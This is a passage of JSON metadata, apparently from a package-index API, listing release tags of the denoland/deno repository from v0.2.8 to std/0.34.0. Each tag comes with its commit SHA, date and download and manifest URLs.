4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_ur